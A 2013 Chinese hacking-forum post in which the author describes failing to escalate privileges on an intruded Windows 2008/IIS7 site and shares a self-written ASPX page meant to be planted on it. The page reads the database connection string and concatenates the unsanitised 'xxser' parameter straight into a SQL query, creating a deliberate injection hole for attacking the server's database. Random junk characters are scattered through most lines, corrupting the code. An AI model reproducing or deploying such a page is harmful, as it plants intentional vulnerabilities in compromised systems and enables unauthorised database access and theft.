昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。6 y& o; \, A- q* S6 @2 W
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
& `2 }0 I9 D8 S8 s3 C代码量不多,自己写个拉倒了。烦死了。
9 u/ I- r# X8 [ D5 Z' K
+ ^" c/ U( G2 V \ ]2 D, |. J* ~2 V0 |7 G, S: x! C, p6 u
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
/ E- R3 J. _! \! ^$ D, N<html xmlns="http://www.w3.org/1999/xhtml">
Q1 @$ a$ | u8 r; w<head runat="server">
, _+ \2 @6 N3 ]3 h" Y <title>暗影aspx构造注射专用页面</title>1 ^1 z! }% g2 K! v" |+ A
</head>
% ~0 ~& w3 G6 s1 G$ F4 X/ ~: B! L<body>
P9 n b I8 l9 q! ~7 e <form id="form1" runat="server">( v/ u' ]8 h( H$ C; i
<div>
) \/ e8 A2 N. |) k* q8 c# K <script language="c#" runat="server">9 p& u! U) a% j$ w" ~: u" }$ [
9 O+ E+ h5 e4 d3 r. k void page_init(object sender, EventArgs e)5 o4 `6 S& m6 P$ w- ]( n e3 f) d
{
U2 [: y; F+ M _ \; ?
& D+ |6 I# u7 }$ w6 ^0 j$ T System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
9 q. P3 r+ a# u' y ! q4 V" n+ Z7 Z/ _
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();! ~: E& U( p- { N$ j1 l
conn.Open();
) K( O F& L$ T# A( _! F6 R) S$ E1 m4 y5 A
' M* F2 O) a6 ? string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
: O- J" J% x6 N# p* u% J) [
: \: v9 y- S6 u System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
7 @" [! H6 ^ ]% _- v int x = command.ExecuteNonQuery();
1 k* Y# B6 z- W9 k5 ~ Response.Write(i+"\n");5 C" g2 y8 l/ h& Z( B v
Response.Write(x);1 P; Z. e$ u5 s/ t& }3 d/ w( z
conn.Close();
! d$ v4 q7 b$ e" T6 g) g6 Y/ c }
) ^/ B# N* A# P# | ! F2 u# d& i2 @" @/ }
</script>. W# c+ D" }# p6 K2 B+ r8 Q) |6 Y
</div>
5 F5 j' F3 j" l2 m2 @; [ </form>
6 x4 Z, K& T* D</body>
" v8 x6 i4 t9 x: B: u* s; t</html>+ L' O( Y/ ]3 t$ Q# ^0 y
|
发表于 2013-3-20 21:32:01
收藏
支持
反对